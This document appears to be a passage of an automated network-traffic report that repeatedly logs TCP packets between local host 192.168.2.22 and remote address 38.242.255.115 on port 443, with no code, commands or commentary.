                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
